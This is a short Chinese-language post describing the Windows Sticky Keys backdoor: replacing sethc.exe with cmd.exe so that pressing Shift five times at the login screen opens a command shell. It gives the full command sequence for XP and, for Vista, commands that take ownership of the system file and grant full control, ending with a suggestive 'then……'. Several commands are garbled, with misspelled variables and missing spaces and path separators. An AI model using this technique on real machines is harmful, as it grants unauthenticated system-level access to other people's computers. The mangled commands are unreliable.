在windows2000/xp/vista下，按shift键5次，可以打开粘置，会运行sethc.exe，而且，在登录界面里也可以打开。这就让人联想到WINDOWS的屏保，将程序替换成cmd.exe后，就可以打开shell了。

参考McafeeAvertLabs：

http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP：

将安装源光盘弹出（或将硬盘上的安装目录改名)

cd%widnir%system32dllcache

rensethc.exe*.ex~

cd%widnir%system32

copy/ycmd.exesethc.exe

VISTA：

takeown/fc:windowssystem32sethc.exe

caclsc:windowssystem32sethc.exe/Gadministrator:F

然后按XP方法替换文件

在登录界面按5此SHIFT，出来cmdshell，然后……